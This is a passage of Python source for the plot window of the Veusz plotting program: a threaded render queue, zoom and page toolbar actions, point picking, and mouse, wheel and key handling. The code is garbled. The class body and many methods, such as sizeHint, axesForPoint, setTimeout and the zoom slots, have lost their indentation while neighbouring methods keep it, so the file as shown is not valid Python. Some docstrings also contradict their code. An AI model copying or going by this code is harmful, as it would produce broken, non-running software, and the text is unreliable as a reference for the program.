        self.latestdrawnjob = -1
        self.plotwindow = plotwindow
        self.updateNumberThreads()
    def updateNumberThreads(self, num=None):
        """Changes the number of rendering threads.

        num=None reads the preference (or 0 if threaded font rendering is
        unsupported); num=0 disables threading entirely.
        """
        if num is None:
            if qt4.QFontDatabase.supportsThreadedFontRendering():
                # use number of threads in preference
                num = setting.settingdb['plot_numthreads']
            else:
                # disable threads
                num = 0
        if self.threads:
            # delete old ones: wake every thread so it sees exit=True
            self.exit = True
            self.sem.release(len(self.threads))
            for t in self.threads:
                t.wait()
            del self.threads[:]
            self.exit = False
        # start new ones
        for i in crange(num):
            t = RenderThread(self)
            t.start()
            self.threads.append(t)
    def exitThreads(self):
        """Exit threads started."""
        self.updateNumberThreads(num=0)
    def processNextJob(self):
        """Take a job from the queue and process it.
        emits renderfinished(jobid, img, painthelper)
        when done, if job has not been superseded
        """
        self.mutex.lock()
        # pop the most recently added job (LIFO)
        jobid, helper = self.latestjobs[-1]
        del self.latestjobs[-1]
        lastadded = self.latestaddedjob
        self.mutex.unlock()
        # don't process jobs which have been superseded
        if lastadded == jobid:
            img = qt4.QImage(helper.pagesize[0], helper.pagesize[1],
                             qt4.QImage.Format_ARGB32_Premultiplied)
            img.fill( setting.settingdb.color('page').rgb() )
            painter = qt4.QPainter(img)
            aa = self.plotwindow.antialias
            painter.setRenderHint(qt4.QPainter.Antialiasing, aa)
            painter.setRenderHint(qt4.QPainter.TextAntialiasing, aa)
            helper.renderToPainter(painter)
            painter.end()
            self.mutex.lock()
            # just throw away result if it older than the latest one
            if jobid > self.latestdrawnjob:
                self.signalRenderFinished.emit(jobid, img, helper)
                self.latestdrawnjob = jobid
            self.mutex.unlock()
        # tell any listeners that a job has been processed
        self.plotwindow.sigQueueChange.emit(-1)
    def addJob(self, helper):
        """Process drawing job in PaintHelper given."""
        # indicate that there is a new item to be processed to listeners
        self.plotwindow.sigQueueChange.emit(1)
        # add the job to the queue
        self.mutex.lock()
        self.latestaddedjob += 1
        self.latestjobs.append( (self.latestaddedjob, helper) )
        self.mutex.unlock()
        if self.threads:
            # tell a thread to process job
            self.sem.release(1)
        else:
            # process job in current thread if multithreading disabled
            self.processNextJob()
class RenderThread( qt4.QThread ):
    """A thread for processing rendering jobs.
    This is controlled by a RenderControl object
    """
    def __init__(self, rendercontrol):
        qt4.QThread.__init__(self)
        self.rc = rendercontrol
    def run(self):
        """Repeat forever until told to exit.
        If it acquires 1 resource from the semaphore it will process
        the next job.
        """
        while True:
            # wait until we can acquire the resources
            self.rc.sem.acquire(1)
            # exit flag is set (and semaphore released) by updateNumberThreads
            if self.rc.exit:
                break
            try:
                self.rc.processNextJob()
            except Exception:
                # never let an exception kill the worker silently
                sys.stderr.write(_("Error in rendering thread\n"))
                traceback.print_exc(file=sys.stderr)
class ControlGraphRoot(qt4.QGraphicsItem):
    """Control graph items are connected to this root item.
    We don't use a group here as it would swallow parent events."""
    def __init__(self):
        qt4.QGraphicsItem.__init__(self)
    def paint(self, painter, option, widget=None):
        # invisible: the root only parents its children
        pass
    def boundingRect(self):
        # empty rect so the item never intercepts clicks
        return qt4.QRectF()
class PlotWindow( qt4.QGraphicsView ):
"""Class to show the plot(s) in a scrollable window."""
# emitted when new item on plot queue
sigQueueChange = qt4.pyqtSignal(int)
# on drawing a page
sigUpdatePage = qt4.pyqtSignal(int)
# point picked on plot
sigPointPicked = qt4.pyqtSignal(object)
# picker enabled
sigPickerEnabled = qt4.pyqtSignal(bool)
# axis values update from moving mouse
sigAxisValuesFromMouse = qt4.pyqtSignal(dict)
# gives widget clicked
sigWidgetClicked = qt4.pyqtSignal(object)
# how often the document can update
updateintervals = (
(0, _('Disable')),
(-1, _('On document change')),
(100, _('Every 0.1s')),
(250, _('Every 0.25s')),
(500, _('Every 0.5s')),
(1000, _('Every 1s')),
(2000, _('Every 2s')),
(5000, _('Every 5s')),
(10000, _('Every 10s')),
)
    def __init__(self, document, parent, menu=None):
        """Initialise the window.

        document: the Veusz document to display
        parent: parent Qt widget
        menu gives a menu to add any menu items to
        """
        qt4.QGraphicsView.__init__(self, parent)
        self.setBackgroundRole(qt4.QPalette.Dark)
        self.scene = qt4.QGraphicsScene()
        self.setScene(self.scene)
        # this graphics scene item is the actual graph
        pixmap = qt4.QPixmap(1, 1)
        self.dpi = (pixmap.logicalDpiX(), pixmap.logicalDpiY())
        self.pixmapitem = self.scene.addPixmap(pixmap)
        # whether full screen mode
        self.isfullscreen = False
        # set to be parent's actions
        self.vzactions = None
        # for controlling plot elements
        self.controlgraphroot = ControlGraphRoot()
        self.scene.addItem(self.controlgraphroot)
        # zoom rectangle for zooming into graph (not shown normally)
        self.zoomrect = self.scene.addRect( 0, 0, 100, 100,
                                            qt4.QPen(qt4.Qt.DotLine) )
        self.zoomrect.setZValue(2.)
        self.zoomrect.hide()
        # picker graphicsitem for marking the picked point
        self.pickeritem = PickerCrosshairItem()
        self.scene.addItem(self.pickeritem)
        self.pickeritem.setZValue(2.)
        self.pickeritem.hide()
        # all the widgets that picker key-navigation might cycle through
        self.pickerwidgets = []
        # the picker state
        self.pickerinfo = widgets.PickInfo()
        # set up so if document is modified we are notified
        self.document = document
        # -100 guarantees the first checkPlotUpdate sees a change
        self.docchangeset = -100
        self.oldpagenumber = -1
        self.document.signalModified.connect(self.slotDocModified)
        # state of last plot from painthelper
        self.painthelper = None
        self.lastwidgetsselected = []
        self.oldzoom = -1.
        self.zoomfactor = 1.
        self.pagenumber = 0
        self.ignoreclick = False
        # for rendering plots in separate threads
        self.rendercontrol = RenderControl(self)
        self.rendercontrol.signalRenderFinished.connect(
            self.slotRenderFinished)
        # mode for clicking
        self.clickmode = 'select'
        self.currentclickmode = None
        # wheel zooming/scrolling accumulator
        self.sumwheeldelta = 0
        # set up redrawing timer
        self.timer = qt4.QTimer(self)
        self.timer.timeout.connect(self.checkPlotUpdate)
        # for drag scrolling
        self.grabpos = None
        self.scrolltimer = qt4.QTimer(self)
        self.scrolltimer.setSingleShot(True)
        # for turning clicking into scrolling after a period
        self.scrolltimer.timeout.connect(self.slotBecomeScrollClick)
        # get plot view updating policy
        #  -1: update on document changes
        #   0: never update automatically
        #  >0: check for updates every x ms
        self.interval = setting.settingdb['plot_updatepolicy']
        # if using a time-based document update checking, start timer
        if self.interval > 0:
            self.timer.start(self.interval)
        # load antialias settings
        self.antialias = setting.settingdb['plot_antialias']
        # allow window to get focus, to allow context menu
        self.setFocusPolicy(qt4.Qt.StrongFocus)
        # get mouse move events if mouse is not pressed
        self.setMouseTracking(True)
        # create toolbar in main window (urgh)
        self.createToolbar(parent, menu)
    def hideEvent(self, event):
        """Window closing, so exit rendering threads."""
        self.rendercontrol.exitThreads()
        qt4.QGraphicsView.hideEvent(self, event)
def sizeHint(self):
"""Return size hint for window."""
p = self.pixmapitem.pixmap()
if p.width() <= 1 and p.height() <= 1:
# if the document has been uninitialized, get the doc size
return qt4.QSize(*self.document.docSize())
return p.size()
    def showToolbar(self, show=True):
        """Show or hide toolbar"""
        self.viewtoolbar.setVisible(show)
    def createToolbar(self, parent, menu=None):
        """Make a view toolbar, and optionally update menu.

        Returns the toolbar. Actions are shared with the parent window's
        vzactions dict when it has one, so shortcuts stay consistent.
        """
        self.viewtoolbar = qt4.QToolBar(_("View toolbar - Veusz"), parent)
        self.viewtoolbar.setObjectName('veuszviewtoolbar')
        iconsize = setting.settingdb['toolbar_size']
        self.viewtoolbar.setIconSize(qt4.QSize(iconsize, iconsize))
        self.viewtoolbar.hide()
        if parent:
            parent.addToolBar(qt4.Qt.TopToolBarArea, self.viewtoolbar)
        if parent and hasattr(parent, 'vzactions'):
            # share actions with parent if possible
            # as plot windows can be isolated from mainwindows, we need this
            self.vzactions = actions = parent.vzactions
        else:
            self.vzactions = actions = {}
        a = utils.makeAction
        actions.update({
            'view.zoomin':
                a(self, _('Zoom into the plot'), _('Zoom &In'),
                  self.slotViewZoomIn,
                  icon='kde-zoom-in', key='Ctrl++'),
            'view.zoomout':
                a(self, _('Zoom out of the plot'), _('Zoom &Out'),
                  self.slotViewZoomOut,
                  icon='kde-zoom-out', key='Ctrl+-'),
            'view.zoom11':
                a(self, _('Restore plot to natural size'), _('Zoom 1:1'),
                  self.slotViewZoom11,
                  icon='kde-zoom-1-veuszedit', key='Ctrl+1'),
            'view.zoomwidth':
                a(self, _('Zoom plot to show whole width'), _('Zoom to width'),
                  self.slotViewZoomWidth,
                  icon='kde-zoom-width-veuszedit'),
            'view.zoomheight':
                a(self, _('Zoom plot to show whole height'), _('Zoom to height'),
                  self.slotViewZoomHeight,
                  icon='kde-zoom-height-veuszedit'),
            'view.zoompage':
                a(self, _('Zoom plot to show whole page'), _('Zoom to page'),
                  self.slotViewZoomPage,
                  icon='kde-zoom-page-veuszedit'),
            'view.zoommenu':
                a(self, _('Zoom functions menu'), _('Zoom'),
                  self.doZoomMenuButton,
                  icon='kde-zoom-veuszedit'),
            'view.prevpage':
                a(self, _('Move to the previous page'), _('&Previous page'),
                  self.slotViewPreviousPage,
                  icon='kde-go-previous', key='Ctrl+PgUp'),
            'view.nextpage':
                a(self, _('Move to the next page'), _('&Next page'),
                  self.slotViewNextPage,
                  icon='kde-go-next', key='Ctrl+PgDown'),
            'view.select':
                a(self, _('Select items from the graph or scroll'),
                  _('Select items or scroll'),
                  None,
                  icon='kde-mouse-pointer'),
            'view.pick':
                a(self, _('Read data points on the graph'),
                  _('Read data points'),
                  None,
                  icon='veusz-pick-data'),
            'view.zoomgraph':
                a(self, _('Zoom into graph'), _('Zoom graph'),
                  None,
                  icon='veusz-zoom-graph'),
            'view.fullscreen':
                a(self, _('View plot full screen'), _('Full screen'),
                  self.slotFullScreen,
                  icon='veusz-view-fullscreen', key='Ctrl+F11'),
            })
        if menu:
            # only construct menu if required
            menuitems = [
                ('view', '', [
                    'view.zoomin', 'view.zoomout',
                    'view.zoom11', 'view.zoomwidth',
                    'view.zoomheight', 'view.zoompage',
                    '',
                    'view.prevpage', 'view.nextpage',
                    'view.fullscreen',
                    '',
                    'view.select', 'view.pick', 'view.zoomgraph',
                    ]),
                ]
            utils.constructMenus(menu, {'view': menu}, menuitems,
                                 actions)
        # populate menu on zoom menu toolbar icon
        zoommenu = qt4.QMenu(self)
        zoomag = qt4.QActionGroup(self)
        for act in ('view.zoomin', 'view.zoomout', 'view.zoom11',
                    'view.zoomwidth', 'view.zoomheight', 'view.zoompage'):
            a = actions[act]
            zoommenu.addAction(a)
            zoomag.addAction(a)
            # vzname lets zoomActionTriggered persist the chosen default
            a.vzname = act
        actions['view.zoommenu'].setMenu(zoommenu)
        zoomag.triggered.connect(self.zoomActionTriggered)
        lastzoom = setting.settingdb.get('view_defaultzoom', 'view.zoompage')
        self.updateZoomMenuButton(actions[lastzoom])
        # add items to toolbar
        utils.addToolbarActions(self.viewtoolbar, actions,
                                ('view.prevpage', 'view.nextpage',
                                 'view.fullscreen',
                                 'view.select', 'view.pick',
                                 'view.zoomgraph', 'view.zoommenu'))
        # define action group for various different selection models
        grp = self.selectactiongrp = qt4.QActionGroup(self)
        grp.setExclusive(True)
        for a in ('view.select', 'view.pick', 'view.zoomgraph'):
            actions[a].setActionGroup(grp)
            actions[a].setCheckable(True)
        actions['view.select'].setChecked(True)
        grp.triggered.connect(self.slotSelectMode)
        return self.viewtoolbar
    def zoomActionTriggered(self, action):
        """Keep track of the last zoom action selected."""
        setting.settingdb['view_defaultzoom'] = action.vzname
        self.updateZoomMenuButton(action)
    def updateZoomMenuButton(self, action):
        """Make zoom button call default zoom action and change icon."""
        menuact = self.vzactions['view.zoommenu']
        setting.settingdb['view_defaultzoom'] = action.vzname
        menuact.setIcon( action.icon() )
def doZoomMenuButton(self):
"""Select previous zoom option when clicking on zoom menu."""
act = self.vzactions[setting.settingdb['view_defaultzoom']]
act.trigger()
    def doZoomRect(self, endpos):
        """Take the zoom rectangle drawn by the user and do the zooming.
        endpos is a QPoint end point
        This is pretty messy - first we have to work out the graph associated
        to the first point
        Then we have to iterate over each of the plotters, identify their
        axes, and change the range of the axes to match the screen region
        selected.
        """
        # safety net
        if self.grabpos is None or endpos is None:
            return
        # get points corresponding to corners of rectangle
        pt1 = self.grabpos
        pt2 = endpos
        # work out whether it's worthwhile to zoom: only zoom if there
        # are >=10 pixels movement in both directions
        if abs((pt2-pt1).x()) < 10 or abs((pt2-pt1).y()) < 10:
            return
        # try to work out in which widget the first point is in
        widget = self.painthelper.pointInWidgetBounds(
            pt1.x(), pt1.y(), widgets.Graph)
        if widget is None:
            return
        # convert points on plotter to points on axis for each axis
        # we also add a neighbouring pixel for the rounding calculation
        xpts = N.array( [pt1.x(), pt2.x(), pt1.x()+1, pt2.x()-1] )
        ypts = N.array( [pt1.y(), pt2.y(), pt2.y()+1, pt2.y()-1] )
        # build up operation list to do zoom
        operations = []
        # collect the set of axes used by plotters in the widget
        axes = {}
        # iterate over children, to look for plotters
        for c in [i for i in widget.children if
                  isinstance(i, widgets.GenericPlotter)]:
            # get axes associated with plotter
            caxes = c.parent.getAxes( (c.settings.xAxis,
                                       c.settings.yAxis) )
            for a in caxes:
                if a:
                    axes[a] = True
        # iterate over each axis, and update the ranges
        for axis in axes:
            s = axis.settings
            if s.direction == 'horizontal':
                p = xpts
            else:
                p = ypts
            # convert points on plotter to axis coordinates
            # FIXME: Need To Trap Conversion Errors!
            try:
                r = axis.plotterToGraphCoords(
                    self.painthelper.widgetBounds(axis), p)
            except KeyError:
                continue
            # invert if min and max are inverted
            if r[1] < r[0]:
                r[1], r[0] = r[0], r[1]
                r[3], r[2] = r[2], r[3]
            # build up operations to change axis
            if s.min != r[0]:
                operations.append( document.OperationSettingSet(
                        s.get('min'),
                        utils.round2delt(r[0], r[2])) )
            if s.max != r[1]:
                operations.append( document.OperationSettingSet(
                        s.get('max'),
                        utils.round2delt(r[1], r[3])) )
        # finally change the axes
        self.document.applyOperation(
            document.OperationMultiple(operations,descr=_('zoom axes')) )
def axesForPoint(self, mousepos):
"""Find all the axes which contain the given mouse position"""
if self.painthelper is None:
return []
pos = self.mapToScene(mousepos)
px, py = pos.x(), pos.y()
axes = []
for widget, bounds in self.painthelper.widgetBoundsIterator(
widgettype=widgets.Axis):
# if widget is axis, and point lies within bounds
if ( px>=bounds[0] and px<=bounds[2] and
py>=bounds[1] and py<=bounds[3] ):
# convert correct pointer position
if widget.settings.direction == 'horizontal':
val = px
else:
val = py
coords=widget.plotterToGraphCoords(bounds, N.array([val]))
axes.append( (widget, coords[0]) )
return axes
    def emitPicked(self, pickinfo):
        """Report that a new point has been picked"""
        # remember state, move the crosshair there and notify listeners
        self.pickerinfo = pickinfo
        self.pickeritem.setPos(pickinfo.screenpos[0], pickinfo.screenpos[1])
        self.sigPointPicked.emit(pickinfo)
    def doPick(self, mousepos):
        """Find the point on any plot-like widget closest to the cursor"""
        self.pickerwidgets = []
        pickinfo = widgets.PickInfo()
        pos = self.mapToScene(mousepos)
        for w, bounds in self.painthelper.widgetBoundsIterator():
            try:
                # ask the widget for its (visually) closest point to the cursor
                info = w.pickPoint(pos.x(), pos.y(), bounds)
                # this is a pickable widget, so remember it for future key navigation
                self.pickerwidgets.append(w)
                if info.distance < pickinfo.distance:
                    # and remember the overall closest
                    pickinfo = info
            except AttributeError:
                # ignore widgets that don't support axes or picking
                continue
        # falsy pickinfo means nothing pickable was found
        if not pickinfo:
            self.pickeritem.hide()
            return
        self.emitPicked(pickinfo)
    def slotBecomeScrollClick(self):
        """If the click is still down when this timer is reached then
        we turn the click into a scrolling click."""
        if self.currentclickmode == 'select':
            qt4.QApplication.setOverrideCursor(qt4.QCursor(qt4.Qt.SizeAllCursor))
            self.currentclickmode = 'scroll'
    def mousePressEvent(self, event):
        """Allow user to drag window around."""
        qt4.QGraphicsView.mousePressEvent(self, event)
        # work out whether user is clicking on a control point
        items = self.items(event.pos())
        self.ignoreclick = ( len(items)==0 or
                             items[0] is not self.pixmapitem or
                             self.painthelper is None )
        if event.button() == qt4.Qt.LeftButton and not self.ignoreclick:
            # need to copy position, otherwise it gets reused!
            self.winpos = qt4.QPoint(event.pos())
            self.grabpos = self.mapToScene(self.winpos)
            if self.clickmode == 'select':
                # we set this to true unless the timer runs out (400ms),
                # then it becomes a scroll click
                # scroll clicks drag the window around, and selecting clicks
                # select widgets!
                self.scrolltimer.start(400)
            elif self.clickmode == 'pick':
                self.pickeritem.show()
                self.pickeritem.setFocus(qt4.Qt.MouseFocusReason)
                self.doPick(event.pos())
            elif self.clickmode == 'scroll':
                qt4.QApplication.setOverrideCursor(
                    qt4.QCursor(qt4.Qt.SizeAllCursor))
            elif self.clickmode == 'graphzoom':
                # start the rubber-band zoom rectangle at the click point
                self.zoomrect.setRect(self.grabpos.x(), self.grabpos.y(),
                                      0, 0)
                self.zoomrect.show()
                #self.label.drawRect(self.grabpos, self.grabpos)
            # record what mode we were clicked in
            self.currentclickmode = self.clickmode
    def mouseMoveEvent(self, event):
        """Scroll window by how much the mouse has moved since last time."""
        qt4.QGraphicsView.mouseMoveEvent(self, event)
        if self.currentclickmode == 'scroll':
            event.accept()
            # move scroll bars by amount
            pos = event.pos()
            dx = self.winpos.x()-pos.x()
            scrollx = self.horizontalScrollBar()
            scrollx.setValue( scrollx.value() + dx )
            dy = self.winpos.y()-pos.y()
            scrolly = self.verticalScrollBar()
            scrolly.setValue( scrolly.value() + dy )
            # need to copy point
            self.winpos = qt4.QPoint(event.pos())
        elif self.currentclickmode == 'graphzoom' and self.grabpos is not None:
            # grow the rubber-band rectangle towards the cursor
            pos = self.mapToScene(event.pos())
            r = self.zoomrect.rect()
            self.zoomrect.setRect( r.x(), r.y(), pos.x()-r.x(),
                                   pos.y()-r.y() )
        elif self.clickmode == 'select' or self.clickmode == 'pick':
            # find axes which map to this position
            axes = self.axesForPoint(event.pos())
            vals = dict([ (a[0].name, a[1]) for a in axes ])
            self.sigAxisValuesFromMouse.emit(vals)
            if self.currentclickmode == 'pick':
                # drag the picker around
                self.doPick(event.pos())
    def mouseReleaseEvent(self, event):
        """If the mouse button is released, check whether the mouse
        clicked on a widget, and emit a sigWidgetClicked(widget)."""
        qt4.QGraphicsView.mouseReleaseEvent(self, event)
        if event.button() == qt4.Qt.LeftButton and not self.ignoreclick:
            event.accept()
            # a release before the 400ms timeout keeps this a select click
            self.scrolltimer.stop()
            if self.currentclickmode == 'select':
                # work out where the mouse clicked and choose widget
                pos = self.mapToScene(event.pos())
                self.locateClickWidget(pos.x(), pos.y())
            elif self.currentclickmode == 'scroll':
                # return the cursor to normal after scrolling
                self.clickmode = 'select'
                self.currentclickmode = None
                qt4.QApplication.restoreOverrideCursor()
            elif self.currentclickmode == 'graphzoom':
                self.zoomrect.hide()
                self.doZoomRect(self.mapToScene(event.pos()))
                self.grabpos = None
            elif self.currentclickmode == 'viewgetclick':
                self.clickmode = 'select'
            elif self.currentclickmode == 'pick':
                self.currentclickmode = None
    def keyPressEvent(self, event):
        """Keypad motion moves the picker if it has focus

        Left/Right steps along the current curve; Up/Down jumps to the
        closest point on another pickable widget above/below.
        """
        if self.pickeritem.hasFocus():
            k = event.key()
            if k == qt4.Qt.Key_Left or k == qt4.Qt.Key_Right:
                # navigate to the previous or next point on the curve
                event.accept()
                dir = 'right' if k == qt4.Qt.Key_Right else 'left'
                ix = self.pickerinfo.index
                pickinfo = self.pickerinfo.widget.pickIndex(
                    ix, dir, self.painthelper.widgetBounds(
                        self.pickerinfo.widget))
                if pickinfo:
                    # more points visible in this direction
                    self.emitPicked(pickinfo)
                return
            elif k == qt4.Qt.Key_Up or k == qt4.Qt.Key_Down:
                # navigate to the next plot up or down on the screen
                event.accept()
                p = self.pickeritem.pos()
                oldw = self.pickerinfo.widget
                pickinfo = widgets.PickInfo()
                dist = float('inf')
                for w in self.pickerwidgets:
                    if w == oldw:
                        continue
                    # ask the widgets to pick their point which is closest horizontally
                    # to the last (screen) x value picked
                    pi = w.pickPoint(self.pickerinfo.screenpos[0], p.y(),
                                     self.painthelper.widgetBounds(w),
                                     distance='horizontal')
                    if not pi:
                        continue
                    dy = p.y() - pi.screenpos[1]
                    # take the new point which is closest vertically to the current
                    # one and either above or below it as appropriate
                    if abs(dy) < dist and ( (k == qt4.Qt.Key_Up and dy > 0)
                                            or (k == qt4.Qt.Key_Down and dy < 0) ):
                        pickinfo = pi
                        dist = abs(dy)
                if pickinfo:
                    oldx = self.pickerinfo.screenpos[0]
                    self.emitPicked(pickinfo)
                    # restore the previous x-position, so that vertical navigation
                    # stays repeatable
                    pickinfo.screenpos = (oldx, pickinfo.screenpos[1])
                return
        # handle up-stream
        qt4.QGraphicsView.keyPressEvent(self, event)
    def wheelEvent(self, event):
        """For zooming in or moving.

        Ctrl+wheel zooms; Shift+wheel scrolls horizontally; a plain wheel
        falls through to the default vertical scroll.  Deltas accumulate in
        sumwheeldelta and trigger once per full notch (120 units).
        """
        if event.modifiers() & qt4.Qt.ControlModifier:
            self.sumwheeldelta += event.delta()
            while self.sumwheeldelta <= -120:
                self.slotViewZoomOut()
                self.sumwheeldelta += 120
            while self.sumwheeldelta >= 120:
                self.slotViewZoomIn()
                self.sumwheeldelta -= 120
        elif event.modifiers() & qt4.Qt.ShiftModifier:
            self.sumwheeldelta += event.delta()
            while self.sumwheeldelta <= -120:
                # scroll left
                self.sumwheeldelta += 120
                scrollx = self.horizontalScrollBar()
                scrollx.setValue(scrollx.value() + 120)
            while self.sumwheeldelta >= 120:
                # scroll right
                scrollx = self.horizontalScrollBar()
                scrollx.setValue(scrollx.value() - 120)
                self.sumwheeldelta -= 120
        else:
            qt4.QGraphicsView.wheelEvent(self, event)
    def locateClickWidget(self, x, y):
        """Work out which widget was clicked, and if necessary send
        a sigWidgetClicked(widget) signal."""
        if self.document.getNumberPages() == 0:
            return
        widget = self.painthelper.identifyWidgetAtPoint(
            x, y, antialias=self.antialias)
        if widget is None:
            # select page if nothing clicked
            widget = self.document.basewidget.getPage(self.pagenumber)
        # tell connected objects that widget was clicked
        if widget is not None:
            self.sigWidgetClicked.emit(widget)
    def setPageNumber(self, pageno):
        """Move to the selected page (clamped to the valid range)."""
        # we don't need to do anything
        if (self.pagenumber == pageno and
            self.document.changeset == self.docchangeset):
            return
        # keep within bounds
        pageno = min(pageno, self.document.getNumberPages()-1)
        pageno = max(0, pageno)
        self.pagenumber = pageno
        # redraw immediately unless automatic updates are disabled (interval 0)
        if self.pagenumber != self.oldpagenumber and self.interval != 0:
            self.checkPlotUpdate()
    def getPageNumber(self):
        """Get the selected page."""
        return self.pagenumber
    @qt4.pyqtSlot(int)
    def slotDocModified(self, ismodified):
        """Update plot on document being modified."""
        # only update if doc is modified and the update policy is set
        # to update on document updates
        if ismodified and self.interval == -1:
            self.checkPlotUpdate()
    def checkPlotUpdate(self):
        """Check whether plot needs updating.

        Redraws only when the zoom, document changeset or page number
        differs from the last drawn state.
        """
        # no threads, so can't get interrupted here
        # draw data into background pixmap if modified
        if ( self.zoomfactor != self.oldzoom or
             self.document.changeset != self.docchangeset or
             self.pagenumber != self.oldpagenumber ):
            self.pickeritem.hide()
            self.pagenumber = min( self.document.getNumberPages() - 1,
                                   self.pagenumber )
            self.oldpagenumber = self.pagenumber
            if self.pagenumber >= 0:
                size = self.document.pageSize(
                    self.pagenumber, scaling=self.zoomfactor)
                # draw the data into the buffer
                # errors cause an exception window to pop up
                try:
                    phelper = document.PaintHelper(
                        size, scaling=self.zoomfactor, dpi=self.dpi)
                    self.document.paintTo(phelper, self.pagenumber)
                except Exception:
                    # stop updates this time round and show exception dialog
                    d = exceptiondialog.ExceptionDialog(sys.exc_info(), self)
                    self.oldzoom = self.zoomfactor
                    self.docchangeset = self.document.changeset
                    d.exec_()
                # NOTE(review): on exception the partially painted helper is
                # still queued below -- presumably deliberate, to show what
                # rendered before the failure; confirm before changing.
                self.painthelper = phelper
                self.rendercontrol.addJob(phelper)
            else:
                # no pages in document: show a blank page-coloured pixmap
                self.painthelper = None
                self.pagenumber = 0
                size = self.document.docSize()
                pixmap = qt4.QPixmap(*size)
                pixmap.fill( setting.settingdb.color('page') )
                self.setSceneRect(0, 0, *size)
                self.pixmapitem.setPixmap(pixmap)
            self.sigUpdatePage.emit(self.pagenumber)
            self.updatePageToolbar()
            self.updateControlGraphs(self.lastwidgetsselected)
            self.oldzoom = self.zoomfactor
            self.docchangeset = self.document.changeset
    def slotRenderFinished(self, jobid, img, helper):
        """Update image on display if rendering (usually in other
        thread) finished.

        jobid and helper are part of the signal signature but unused here.
        """
        bufferpixmap = qt4.QPixmap.fromImage(img)
        self.setSceneRect(0, 0, bufferpixmap.width(), bufferpixmap.height())
        self.pixmapitem.setPixmap(bufferpixmap)
    def updatePlotSettings(self):
        """Update plot window settings from settings."""
        self.setTimeout(setting.settingdb['plot_updatepolicy'])
        self.antialias = setting.settingdb['plot_antialias']
        self.rendercontrol.updateNumberThreads()
        # redraw so the new settings take effect immediately
        self.actionForceUpdate()
    def contextMenuEvent(self, event):
        """Show context menu."""
        menu = qt4.QMenu(self)
        # add some useful entries
        menu.addAction( self.vzactions['view.zoommenu'] )
        menu.addSeparator()
        menu.addAction( self.vzactions['view.prevpage'] )
        menu.addAction( self.vzactions['view.nextpage'] )
        menu.addSeparator()
        # force an update now menu item
        menu.addAction(_('Force update'), self.actionForceUpdate)
        if self.isfullscreen:
            menu.addAction(_('Close full screen'), self.slotFullScreen)
        else:
            menu.addAction( self.vzactions['view.fullscreen'] )
        # Update policy submenu
        submenu = menu.addMenu(_('Updates'))
        intgrp = qt4.QActionGroup(self)
        # bind interval options to actions
        for intv, text in self.updateintervals:
            act = intgrp.addAction(text)
            act.setCheckable(True)
            # factory function binds intv at definition time, avoiding the
            # late-binding-closure pitfall in this loop
            def setfn(interval):
                return lambda checked: self.actionSetTimeout(interval, checked)
            act.triggered.connect(setfn(intv))
            if intv == self.interval:
                act.setChecked(True)
            submenu.addAction(act)
        # antialias
        menu.addSeparator()
        act = menu.addAction(_('Antialias'), self.actionAntialias)
        act.setCheckable(True)
        act.setChecked(self.antialias)
        menu.exec_(qt4.QCursor.pos())
    def actionForceUpdate(self):
        """Force an update for the graph."""
        # an impossible changeset guarantees checkPlotUpdate sees a change
        self.docchangeset = -100
        self.checkPlotUpdate()
    def slotFullScreen(self):
        """Show window full screen or not."""
        if not self.isfullscreen:
            self._fullscreenwindow = FullScreenPlotWindow(
                self.document, self.pagenumber)
        else:
            # cheesy way of closing full screen window:
            # walk up to the top-level parent and close it
            p = self
            while p.parent() is not None:
                p = p.parent()
            p.close()
def setTimeout(self, interval):
"""Change timer setting without changing save value."""
self.interval = interval
if interval <= 0:
# stop updates
if self.timer.isActive():
self.timer.stop()
else:
# change interval to one selected
self.timer.setInterval(interval)
# start timer if it was stopped
if not self.timer.isActive():
self.timer.start()
    def actionSetTimeout(self, interval, checked):
        """Called by setting the interval."""
        self.setTimeout(interval)
        # remember changes for next time
        setting.settingdb['plot_updatepolicy'] = self.interval
    def actionAntialias(self):
        """Toggle antialias."""
        self.antialias = not self.antialias
        setting.settingdb['plot_antialias'] = self.antialias
        self.actionForceUpdate()
def setZoomFactor(self, zoomfactor):
"""Set the zoom factor of the window."""
zoomfactor = max(0.05, min(20, zoomfactor))
self.zoomfactor = float(zoomfactor)
self.checkPlotUpdate()
    def slotViewZoomIn(self):
        """Zoom into the plot by a factor of sqrt(2)."""
        self.setZoomFactor(self.zoomfactor * N.sqrt(2.))
def slotViewZoomOut(self):
"""Zoom out of the plot."""
self.setZoomFactor(self.zoomfactor / N.sqrt(2.))
def slotViewZoomWidth(self):
"""Make the zoom factor so that the plot fills the whole width."""
# need to take account of scroll bars when deciding size
viewportsize = self.maximumViewportSize()
aspectwin = viewportsize.width() / viewportsize.height()
r = self.pixmapitem.boundingRect()
aspectplot = r.width() / r.height()
width = viewportsize.width()
if aspectwin > aspectplot:
# take account of scroll bar
width -= self.verticalScrollBar().width()
mult = width / r.width()
self.setZoomFactor(self.zoomfactor * mult)
def slotViewZoomHeight(self):
"""Make the zoom factor so that the plot fills the whole width."""
# need to take account of scroll bars when deciding size
viewportsize = self.maximumViewportSize()
aspectwin = viewportsize.width() / viewportsize.height()
r = self.pixmapitem.boundingRect()
aspectplot = r.width() / r.height()
height = viewportsize.height()
if aspectwin < aspectplot:
# take account of scroll bar
height -= self.horizontalScrollBar().height()
mult = height / r.height()
self.setZoomFactor(self.zoomfactor * mult)
def slotViewZoomPage(self):
"""Make the zoom factor correct to show the whole page."""
viewportsize = self.maximumViewportSize()
r = self.pixmapitem.boundingRect()
if r.width() != 0 and r.height() != 0:
multw = viewportsize.width() / r.width()
multh = viewportsize.height() / r.height()
self.setZoomFactor(self.zoomfactor * min(multw, multh))
def slotViewZoom11(self):
"""Restore the zoom to 1:1"""
self.setZoomFactor(1.)
def slotViewPreviousPage(self):
"""View the previous page."""
self.setPageNumber( self.pagenumber - 1 )
def slotViewNextPage(self):
"""View the next page."""
self.setPageNumber( self.pagenumber + 1 )
def updatePageToolbar(self):
"""Update page number when the plot window says so."""
# disable previous and next page actions
if self.vzactions is not None:
np = self.document.getNumberPages()
self.vzactions['view.prevpage'].setEnabled(self.pagenumber != 0)
self.vzactions['view.nextpage'].setEnabled(self.pagenumber < np-1)
def slotSelectMode(self, action):
"""Called when the selection mode has changed."""
modecnvt = { self.vzactions['view.select'] : 'select',
self.vzactions['view.pick'] : 'pick',
self.vzactions['view.zoomgraph'] : 'graphzoom' }
# close the current picker
self.pickeritem.hide()
self.sigPickerEnabled.emit(False)
# convert action into clicking mode
self.clickmode = modecnvt[action]
if self.clickmode == 'select':
self.pixmapitem.unsetCursor()
#self.label.setCursor(qt4.Qt.ArrowCursor)
elif self.clickmode == 'graphzoom':
